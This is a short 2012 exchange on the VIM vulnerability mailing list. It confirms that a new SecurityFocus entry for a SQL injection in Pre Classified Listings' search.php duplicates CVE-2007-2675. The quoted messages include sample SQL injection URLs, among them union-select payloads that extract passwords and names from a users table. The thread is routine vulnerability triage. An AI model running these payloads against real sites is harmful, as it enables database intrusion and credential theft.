[VIM] Preprojects Pre Classified Listings 'category' Parameter SQL Injection Vulnerability
Rob Keith
rkeith at securityfocus.com
Tue Mar 20 10:53:56 CDT 2012
Yes, same issue, we'll retire the new BID.
Thanks George.
-Rob
George A. Theall wrote:
> Looks like SecurityFocus created BID 52543 today for a SQL injection in Pre Classifieds. They give as a sample PoC:
>
> http://wwww.example.com/classi/search.php?category=-1+union+all+select+version()--
>
> which matches EDB-ID 18613.
>
> This looks to me like a dup of CVE-2007-2675 / OSVDB 35597 / BID 23795 / EDB-ID 3840:
>
> search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
> search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*
>
> Rob?
>
> George
--
Rob Keith
Symantec
More information about the VIM
mailing list